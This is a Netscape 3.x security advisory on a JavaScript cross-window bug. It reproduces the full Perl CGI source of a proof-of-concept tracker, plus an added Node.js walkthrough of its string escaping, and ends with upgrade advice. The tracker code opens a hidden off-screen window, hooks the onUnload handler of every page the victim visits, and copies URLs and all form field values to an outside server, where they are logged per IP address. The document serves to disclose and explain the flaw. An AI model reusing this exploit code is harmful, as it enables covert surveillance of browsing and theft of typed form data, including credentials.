COMMAND
javascript
SYSTEMS AFFECTED
Systems running Netscape
PROBLEM
This is a variation of the JavaScript #1 problem. I say variation because,
although CERT and Netscape say that Netscape 3.02 fixes this, it did not
appear to fix the problem demonstrated at:
http://www.aleph2.com/tracker/
This page demonstrates a bug discovered in Netscape's implementation of
JavaScript. If your version and platform are affected, your subsequent
browsing activities are currently being tracked. Known affected versions
are Netscape 3.x for all platforms, including the just-released 3.02 which
supposedly fixes this problem. Credit goes to Dan Brumleve.
Here is the source of the two CGI scripts that make this work on the page
mentioned above. An explanation of how the exploit works is included as a
comment in the tracker.cgi source.
Source of tracker.cgi (one part):
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
#
# ----------------------------------------------------------------
# Explanation of the exploit:
#
# When your browser loads this page, another window ("infect.cgi")
# is created using the onLoad mechanism. If you're using
# X-windows this window will be placed off the screen because its
# size overflows into its position, otherwise it will simply be
# 0x0.
#
# When the "infect.cgi" window loads it sets the original window's
# onUnload function to some JavaScript code that copies the
# location and form data into the values of a form in the
# "infect.cgi" window. This should not be possible to do, but I
# found a way to use "javascript:" URLs to pass private data
# between windows.
#
# After the original window copies its information into the form
# in "infect.cgi" it tells that form to submit (the action being
# itself). Here is where the big problem happens: The original
# window's onUnload function exits before the "infect.cgi" window
# finishes changing location. By the time the "infect.cgi" window
# finishes submitting, the original window is at a new location,
# so the "infect.cgi" window changes the onUnload function of the
# new document as soon as it loads, and the cycle continues...
chop($tm = `date`);
# One log file per client address; created on the first visit only.
$log = "/www/html/tracker/logs/log-$ENV{REMOTE_ADDR}.txt";
unless (-e $log) {
    open(FP, "> $log");
    print FP <<EOT;
Below is a list of all the URLs you've visited since
$tm, each one followed by the
contents of any forms on those pages.
EOT
    close(FP);
}
print <<EOF;
Content-type: text/html
<html>
<head>
<title>Tracker</title>
</head>
<body bgcolor="#000000" text="#ffffff"
      link="#ff0000" vlink="#ff0000" alink="#ff0000"
      onLoad="window.open('http://www.aleph2.com/tracker/infect.cgi', 'infect', 'width=65529,height=65536')">
.... [the original source of web page] ....
Source of infect.cgi:
#!/usr/bin/perl
#
# JavaScript tracker -- Copyright (C) 1997 Dan Brumleve
$infect = "http://www.aleph2.com/tracker/infect.cgi";
print <<EOF;
Content-type: text/html
<html>
<head>
<title>Infect</title>
<script>
function infect_window(w) {
    var str = "", i;
    w.onunload = new Function(
        'var i, j, v;' +
        'v = window.open("", "infect"); ' +
        'v.document.data.url.value = location; ' +
        'v.document.data.fd.value = ""; ' +
        'for (i = 0; i < document.forms.length; i++) { ' +
        ' v.document.data.fd.value += "<form%20action%3d\\\\"" + ' +
        ' escape(document.forms[i].action) + "\\\\"%20method%3d\\\\"" +' +
        ' escape(document.forms[i].method) + "\\\\">%0A";' +
        ' for (j = 0; j < document.forms[i].elements.length; j++) {' +
        ' v.document.data.fd.value += "<input%20type%3d\\\\"" + ' +
        ' escape(document.forms[i].elements[j].type) + "\\\\"%20name%3d\\\\"" + ' +
        ' escape(document.forms[i].elements[j].name) + "\\\\"%20value%3d\\\\"" + ' +
        ' escape(document.forms[i].elements[j].value) + "\\\\">%0A";' +
        ' } ' +
        ' v.document.data.fd.value += "</form>%0A"; ' +
        '} ' +
        'v.location = v.document.data.action + "?url=" + ' +
        ' v.document.data.url.value + "&fd=" + v.document.data.fd.value');
}
function infect() {
    infect_window(window.opener);
}
</script>
</head>
<body onLoad=infect()>
<form name=data action="$infect" method=post>
    <input type=hidden name=url>
    <input type=hidden name=fd>
</form>
</body>
</html>
EOF
# The parent returns the page to the browser; the child appends to the log.
exit 0 if fork;
if ($ENV{QUERY_STRING}) {
    $input = $ENV{QUERY_STRING};
    $fn = "/www/html/tracker/logs/log-" . $ENV{REMOTE_ADDR} . ".txt";
    # Split the query string into name=value pairs and URL-decode each value.
    @fields = split(/&/, $input);
    foreach $a (@fields) {
        $a =~ s/\+/ /g;
        ($n, $v) = split(/=/, $a);
        $v =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $input{$n} = $v;
    }
    # Indent each line of the reconstructed form data under its URL.
    @fields = split(/\n+/, $input{fd});
    $fd = "";
    foreach $f (@fields) {
        $f = " " . $f;
        $fd .= $f . "\n";
    }
    open(FP, ">> $fn") || die;
    chop($tm = `date`);
    print FP "$tm $input{url}\n$fd";
    close(FP);
}
exit 0;
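To make the listing above easier to audit, here is an added example (not part of the advisory or of the tracker's own code) in Node.js that walks one line of infect.cgi through the string layers it passes: Perl heredoc interpolation, JavaScript literal concatenation into the Function body, and the percent-decoding the Perl loop applies to the fd parameter. The sampleFd value and the www.example.test URL are constructed.

```javascript
// Added example, not part of the advisory or of Dan Brumleve's tracker code.
// It reproduces the string layers the infect.cgi onunload body passes through
// so the four backslashes in the listing can be read: Perl's interpolating
// heredoc halves them, the JS single-quoted literals halve them again, and the
// Function constructor finally sees an escaped quote. It also mirrors the
// percent-decoding loop the Perl script applies to the "fd" query value.

// One source line of infect.cgi as printed in the listing (constructed copy).
const perlLine =
  String.raw`' v.document.data.fd.value += "<form%20action%3d\\\\"" + ' +`;

// Layer 1: Perl heredoc interpolation turns each "\\" into "\".
// ($infect interpolation is not exercised by this line.)
function perlHeredoc(s) {
  return s.replace(/\\\\/g, "\\");
}

// Layer 2: the <script> concatenates single-quoted literals into the
// Function body. Evaluate them without eval: extract each '...' and unescape.
function jsConcatLiterals(s) {
  const literal = /'((?:[^'\\]|\\.)*)'/g;
  const parts = [];
  let m;
  while ((m = literal.exec(s)) !== null) {
    parts.push(m[1].replace(/\\(.)/g, "$1"));
  }
  return parts.join("");
}

// What the Function constructor receives for this line.
function functionBodyFragment(line) {
  return jsConcatLiterals(perlHeredoc(line));
}

// Layer 3: server side. The Perl loop's decoding of each query value
// ("+" to space, %XX to a byte), written in JS.
function perlStyleDecode(v) {
  return v.replace(/\+/g, " ")
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// A constructed "fd" value of the shape the onunload body builds for one
// search form; decoding it yields the HTML that ends up in the per-IP log.
const sampleFd =
  '<form%20action%3d"http%3A//www.example.test/search"%20method%3d"get">%0A' +
  '<input%20type%3d"text"%20name%3d"q"%20value%3d"netscape">%0A</form>%0A';

console.log(functionBodyFragment(perlLine));
console.log(perlStyleDecode(sampleFd));
```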
SOLUTION
Communicator 4.01 did not seem to be affected by the problem.
Users of Netscape 3.x should upgrade to Netscape 3.04.
Since Netscape Navigator is installed by default on IRIX 6.2 and later,
the solution for those systems is to install or upgrade to version 3.04
or later of Netscape Navigator.
Silicon Graphics provides a customized Netscape Navigator 3.04
subsystem for IRIX 5.3, 6.2, 6.3 and 6.4; it can be found at
the following URL:
http://www.sgi.com/Products/Evaluation/